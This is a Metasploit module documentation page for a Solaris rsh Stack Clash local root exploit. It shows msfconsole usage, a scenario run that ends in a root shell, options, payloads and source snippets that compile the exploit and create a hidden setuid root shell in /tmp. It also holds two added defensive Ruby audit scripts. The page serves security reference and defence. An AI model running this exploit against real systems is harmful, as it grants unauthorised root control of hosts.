Solaris RSH Stack Clash Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/solaris/local/rsh_stack_clash_priv_esc Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Solaris RSH Stack Clash Privilege Escalation
Module: exploit/solaris/local/rsh_stack_clash_priv_esc
Source code: modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb
Disclosure date: 2017-06-19
Last modification time: 2020-09-18 11:38:43 +0000
Supported architecture(s): x86, x64
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-3629, CVE-2017-3630, CVE-2017-3631, CVE-2017-1000364

This module is also known as Stack Clash or Solaris_rsh.c.

This module exploits a vulnerability in RSH on unpatched Solaris systems which allows users to gain root privileges. The stack guard page on unpatched Solaris systems is of insufficient size to prevent collisions between the stack and heap memory, aka Stack Clash. This module uploads and executes Qualys' Solaris_rsh.c exploit, which exploits a vulnerability in RSH to bypass the stack guard page to write to the stack and create a SUID root shell. This module has offsets for Solaris versions 11.1 (x86) and Solaris 11.3 (x86). Exploitation will usually complete within a few minutes using the default number of worker threads (10). Occasionally, exploitation will fail. If the target system is vulnerable, usually re-running the exploit will be successful. This module has been tested successfully on Solaris 11.1 (x86) and Solaris 11.3 (x86).

Module Ranking and Traits


Module Ranking:

  • good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc.). More information about ranking can be found in the Metasploit module ranking documentation.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/solaris/local/rsh_stack_clash_priv_esc
msf exploit(rsh_stack_clash_priv_esc) > show targets
    ... a list of targets ...
msf exploit(rsh_stack_clash_priv_esc) > set TARGET target-id
msf exploit(rsh_stack_clash_priv_esc) > show options
    ... show and set options ...
msf exploit(rsh_stack_clash_priv_esc) > set SESSION session-id
msf exploit(rsh_stack_clash_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module exploits a vulnerability in RSH on unpatched Solaris systems which allows users to gain root privileges.

The stack guard page on unpatched Solaris systems is of insufficient size to prevent collisions between the stack and heap memory, aka Stack Clash.

This module uploads and executes Qualys' Solaris_rsh.c exploit, which exploits a vulnerability in RSH to bypass the stack guard page to write to the stack and create a SUID root shell.

This module has offsets for Solaris versions 11.1 (x86) and Solaris 11.3 (x86).

Exploitation will usually complete within a few minutes using the default number of worker threads (10). Occasionally, exploitation will fail. If the target system is vulnerable, usually re-running the exploit will be successful.

Vulnerable Application


This module has been tested successfully on:

  • Solaris 11.1 (x86)
  • Solaris 11.3 (x86)

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/solaris/local/rsh_stack_clash_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: run
  6. You should get a new root session

Options


SESSION

The session to run this module on. Available sessions can be listed with the sessions command.

RSH_PATH

Path to rsh executable. (default: /usr/bin/rsh)

WORKERS

Number of workers. (default: 10)

Scenarios


Solaris 11.3 (x86)

  msf5 > use exploit/solaris/local/rsh_stack_clash_priv_esc
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1
  session => 1
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221
  rhost => 172.16.191.221
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > run

  [!] SESSION may not be compatible with this module.
  [*] Using target: Solaris 11.3
  [*] Writing '/tmp/.2yZgv2XkEj/.KJqSwhpguh.c' (10297 bytes) ...
  [*] Symlinking /tmp/.2yZgv2XkEj/.KJqSwhpguh to /tmp/.2yZgv2XkEj/ROOT
  [*] Creating suid root shell. This may take a while...
  [*] Completed in 324.21s
  [+] suid root shell created: /tmp/.2yZgv2XkEj/ROOT
  [*] Writing '/tmp/.2yZgv2XkEj/.bWjzWVllCB' (109 bytes) ...
  [*] Executing payload...
  [*] Started bind TCP handler against 172.16.191.221:4444
  [+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh.c
  [+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh
  [!] Tried to delete /tmp/.2yZgv2XkEj/ROOT, unknown result
  [+] Deleted /tmp/.2yZgv2XkEj/.bWjzWVllCB
  [+] Deleted /tmp/.2yZgv2XkEj

  id
  uid=0(root) gid=0(root) groups=10(staff)
  uname -a
  SunOS solaris 5.11 11.3 i86pc i386 i86pc
  cat /etc/release
                               Oracle Solaris 11.3 X86
    Copyright (c) 1983, 2015, Oracle and/or its affiliates.  All rights reserved.
                              Assembled 06 October 2015
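The run above ends with "[!] Tried to delete /tmp/.2yZgv2XkEj/ROOT, unknown result": the setuid root shell the module creates inside a hidden directory under /tmp can outlive the session. The following Ruby script is an added example written here from the defender's side; it is not part of the module or of this page. It flags root-owned setuid files under /tmp and /var/tmp and adds weight for hidden (dot-prefixed) path components and for the file name ROOT. The sample entries are constructed (the first path is taken from the output above), and scan_temp_dirs is an assumed helper for collecting the same data from a live host.

```ruby
require 'find'

SETUID_BIT = 0o4000
TEMP_DIRS  = %w[/tmp /var/tmp].freeze

# Reasons a file deserves attention. An entry is a hash with :path (String),
# :mode (Integer permission bits) and :uid (Integer owner). Only setuid files
# owned by root and located under a temporary directory are reported.
def suid_findings(entry)
  reasons = []
  setuid_root = (entry[:mode] & SETUID_BIT) != 0 && entry[:uid].zero?
  in_temp_dir = TEMP_DIRS.any? { |d| entry[:path].start_with?("#{d}/") }
  return reasons unless setuid_root && in_temp_dir

  reasons << 'setuid root executable in a temporary directory'
  segments = entry[:path].split('/').reject(&:empty?)
  if segments.any? { |s| s.start_with?('.') }
    reasons << 'hidden (dot-prefixed) path component'
  end
  if segments.last == 'ROOT'
    reasons << "file name 'ROOT' matches the artifact left by this module"
  end
  reasons
end

# Audit a list of entries; returns { path => [reasons] } for flagged files only.
def audit_suid(entries)
  entries.each_with_object({}) do |entry, report|
    reasons = suid_findings(entry)
    report[entry[:path]] = reasons unless reasons.empty?
  end
end

# Assumed helper: collect entries from a live filesystem. lstat is used so
# symlinks are not followed; only regular files' own mode bits are reported,
# and unreadable paths are skipped. Not executed by the sample run below.
def scan_temp_dirs(dirs = TEMP_DIRS)
  entries = []
  dirs.each do |dir|
    next unless File.directory?(dir)
    Find.find(dir) do |path|
      begin
        st = File.lstat(path)
      rescue SystemCallError
        next
      end
      next unless st.file?
      entries << { path: path, mode: st.mode & 0o7777, uid: st.uid }
    end
  end
  entries
end

# Constructed sample entries (the first path is copied from the run above).
SAMPLE_ENTRIES = [
  { path: '/tmp/.2yZgv2XkEj/ROOT', mode: 0o4755, uid: 0 },  # leftover suid root shell
  { path: '/tmp/.cache/build.log', mode: 0o644, uid: 100 }, # hidden, but harmless
  { path: '/usr/bin/rsh', mode: 0o4555, uid: 0 },           # setuid root, but not in a temp dir
  { path: '/var/tmp/helper', mode: 0o4755, uid: 100 }       # setuid, but not root-owned
].freeze

if __FILE__ == $PROGRAM_NAME
  audit_suid(SAMPLE_ENTRIES).each do |path, reasons|
    puts "#{path}: #{reasons.join('; ')}"
  end
end
```

Only the first sample entry is reported, with all three reasons. Running audit_suid(scan_temp_dirs) from a periodic job or a file-integrity check gives the same verdict on a real host; any hit should be investigated and removed, since a root-owned setuid binary in a world-writable directory has no legitimate reason to exist.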


Msfconsole Usage


Here is how the solaris/local/rsh_stack_clash_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/solaris/local/rsh_stack_clash_priv_esc

[*] Using configured payload cmd/unix/bind_netcat
msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show info

       Name: Solaris RSH Stack Clash Privilege Escalation
     Module: exploit/solaris/local/rsh_stack_clash_priv_esc
   Platform: Unix
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2017-06-19

Provided by:
  Qualys Corporation
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Solaris 11.1
  2   Solaris 11.3

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RSH_PATH  /usr/bin/rsh     yes       Path to rsh executable
  SESSION                    yes       The session to run this module on.
  WORKERS   10               yes       Number of workers

Payload information:

Description:
  This module exploits a vulnerability in RSH on unpatched Solaris 
  systems which allows users to gain root privileges. The stack guard 
  page on unpatched Solaris systems is of insufficient size to prevent 
  collisions between the stack and heap memory, aka Stack Clash. This 
  module uploads and executes Qualys' Solaris_rsh.c exploit, which 
  exploits a vulnerability in RSH to bypass the stack guard page to 
  write to the stack and create a SUID root shell. This module has 
  offsets for Solaris versions 11.1 (x86) and Solaris 11.3 (x86). 
  Exploitation will usually complete within a few minutes using the 
  default number of worker threads (10). Occasionally, exploitation 
  will fail. If the target system is vulnerable, usually re-running 
  the exploit will be successful. This module has been tested 
  successfully on Solaris 11.1 (x86) and Solaris 11.3 (x86).

References:
  http://www.securityfocus.com/bid/99151
  http://www.securityfocus.com/bid/99153
  https://nvd.nist.gov/vuln/detail/CVE-2017-1000364
  https://nvd.nist.gov/vuln/detail/CVE-2017-3629
  https://nvd.nist.gov/vuln/detail/CVE-2017-3630
  https://nvd.nist.gov/vuln/detail/CVE-2017-3631
  https://www.exploit-db.com/exploits/42270
  http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html
  https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash
  https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt

Also known as:
  Stack Clash
  Solaris_rsh.c

Module Options


This is a complete list of options available in the solaris/local/rsh_stack_clash_priv_esc exploit:

msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show options

Module options (exploit/solaris/local/rsh_stack_clash_priv_esc):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RSH_PATH  /usr/bin/rsh     yes       Path to rsh executable
   SESSION                    yes       The session to run this module on.
   WORKERS   10               yes       Number of workers

Payload options (cmd/unix/bind_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the solaris/local/rsh_stack_clash_priv_esc exploit:

msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show advanced

Module advanced options (exploit/solaris/local/rsh_stack_clash_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                10               no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (cmd/unix/bind_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the solaris/local/rsh_stack_clash_priv_esc module can exploit:

msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Solaris 11.1
   2   Solaris 11.3

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the solaris/local/rsh_stack_clash_priv_esc exploit:

msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show payloads

Compatible Payloads
===================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  payload/generic/custom                              normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                      normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                   normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the solaris/local/rsh_stack_clash_priv_esc exploit in order to evade defenses (e.g. antivirus, EDR, firewall, NIDS):

msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

<PATH>.c failed to compile


Here is a relevant code snippet related to the "<PATH>.c failed to compile" error message:

    upload "#{path}.c", data

    output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -Wall -std=gnu99 -o #{path} #{path}.c"
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end

    register_file_for_cleanup path
  end


<RSH_PATH> is not setuid


Here is a relevant code snippet related to the "<RSH_PATH> is not setuid" error message:

    register_file_for_cleanup link_name
  end

  def check
    unless setuid? rsh_path
      vprint_error "#{rsh_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{rsh_path} is setuid"

    unless has_gcc?

gcc is not installed


Here is a relevant code snippet related to the "gcc is not installed" error message:

      return CheckCode::Safe
    end
    vprint_good "#{rsh_path} is setuid"

    unless has_gcc?
      vprint_error 'gcc is not installed'
      return CheckCode::Safe
    end
    vprint_good 'gcc is installed'

    version = kernel_version

Could not determine Solaris version


Here is a relevant code snippet related to the "Could not determine Solaris version" error message:

    end
    vprint_good 'gcc is installed'

    version = kernel_version
    if version.to_s.eql? ''
      vprint_error 'Could not determine Solaris version'
      return CheckCode::Detected
    end

    unless ['11.1', '11.3'].include? version
      vprint_error "Solaris version #{version} is not vulnerable"

Solaris version <VERSION> is not vulnerable


Here is a relevant code snippet related to the "Solaris version <VERSION> is not vulnerable" error message:

      vprint_error 'Could not determine Solaris version'
      return CheckCode::Detected
    end

    unless ['11.1', '11.3'].include? version
      vprint_error "Solaris version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Solaris version #{version} appears to be vulnerable"

    CheckCode::Detected
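The check snippets above test three conditions in sequence: rsh is setuid, gcc is present, and the Solaris version is one of those the module has offsets for. The Ruby script below is an added example, not the module's own code, that evaluates the same conditions from explicit inputs so an administrator can audit a host's exposure without loading the module. It assumes the version can be read from the "Oracle Solaris 11.x" banner in /etc/release (the module uses its own kernel_version helper) and that gcc --version reports a usable compiler; gather_facts is an assumed helper for a live host. Where the module's check returns Safe for versions other than 11.1 and 11.3, this script reports them as untargeted rather than safe, because the absence of offsets does not establish that the host is patched.

```ruby
# Versions the module carries offsets for (from the check code above).
MODULE_VERSIONS = %w[11.1 11.3].freeze
SETUID_BIT = 0o4000

# Extract "11.x" from /etc/release text such as "Oracle Solaris 11.3 X86".
# Assumption: the release banner uses this wording on the hosts audited.
def solaris_version(release_text)
  m = release_text.match(/Oracle Solaris (\d+\.\d+)/)
  m ? m[1] : ''
end

# Evaluate the same conditions the module's check tests, in the same order:
# setuid-root rsh, a usable gcc, and a Solaris version with known offsets.
# Returns [verdict, reason].
def assess_exposure(rsh_mode:, rsh_uid:, gcc_present:, release_text:)
  setuid_root = (rsh_mode & SETUID_BIT) != 0 && rsh_uid.zero?
  return [:safe, 'rsh is not setuid root'] unless setuid_root
  return [:safe, 'gcc is not installed'] unless gcc_present

  version = solaris_version(release_text)
  return [:unknown, 'could not determine Solaris version'] if version.empty?
  unless MODULE_VERSIONS.include?(version)
    # The module reports Safe here; a defender should still confirm patch state.
    return [:untargeted, "Solaris #{version} is not a version this module has offsets for; confirm patch state separately"]
  end

  [:exposed, "Solaris #{version} with setuid rsh and gcc present; apply the Oracle fix for CVE-2017-3629"]
end

# Assumed helper: collect the inputs on a live host (/usr/bin/rsh,
# /etc/release and `gcc --version`). Not executed by the sample run below.
def gather_facts(rsh_path = '/usr/bin/rsh')
  st = File.stat(rsh_path)
  {
    rsh_mode: st.mode & 0o7777,
    rsh_uid: st.uid,
    gcc_present: system('gcc --version >/dev/null 2>&1') == true,
    release_text: File.file?('/etc/release') ? File.read('/etc/release') : ''
  }
end

# Constructed release banner, copied from the scenario output on this page.
SAMPLE_RELEASE = <<~TEXT
                               Oracle Solaris 11.3 X86
    Copyright (c) 1983, 2015, Oracle and/or its affiliates.  All rights reserved.
                              Assembled 06 October 2015
TEXT

if __FILE__ == $PROGRAM_NAME
  # Constructed facts for an unpatched 11.3 host with a setuid rsh and gcc.
  facts = { rsh_mode: 0o4555, rsh_uid: 0, gcc_present: true, release_text: SAMPLE_RELEASE }
  verdict, reason = assess_exposure(**facts)
  puts "#{verdict}: #{reason}"
end
```

On a real host, assess_exposure(**gather_facts) gives the verdict; an :exposed result means the Oracle advisory listed in the references above applies and the patch should be installed. Removing the setuid bit from rsh also takes the host out of the module's reach, but it is a workaround rather than a fix for the underlying guard-page weakness.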

Session already has root privileges


Here is a relevant code snippet related to the "Session already has root privileges" error message:

    CheckCode::Detected
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

<WRITABLEDIR> is not writable


Here is a relevant code snippet related to the "<WRITABLEDIR> is not writable" error message:

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    if target.name.eql? 'Automatic'
      case kernel_version
      when '11.1'

Unable to automatically select a target


Here is a relevant code snippet related to the "Unable to automatically select a target" error message:

        arg = 0
      when '11.3'
        my_target = targets[2]
        arg = 1
      else
        fail_with Failure::NoTarget, 'Unable to automatically select a target'
      end
    else
      my_target = target
    end
    print_status "Using target: #{my_target.name}"

Failed to create suid root shell: <OUTPUT>


Here is a relevant code snippet related to the "Failed to create suid root shell: <OUTPUT>" error message:

    start = Time.now
    output = cmd_exec "./#{exploit_name} #{arg}", nil, 1_800
    stop = Time.now
    print_status "Completed in #{(stop - start).round(2)}s"
    unless output.include? 'root'
      fail_with Failure::Unknown, "Failed to create suid root shell: #{output}"
    end
    print_good "suid root shell created: #{base_path}/#{root_shell}"

    payload_name = ".#{rand_text_alphanumeric 5..10}"
    payload_path = "#{base_path}/#{payload_name}"


Authors


  • Qualys Corporation
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.
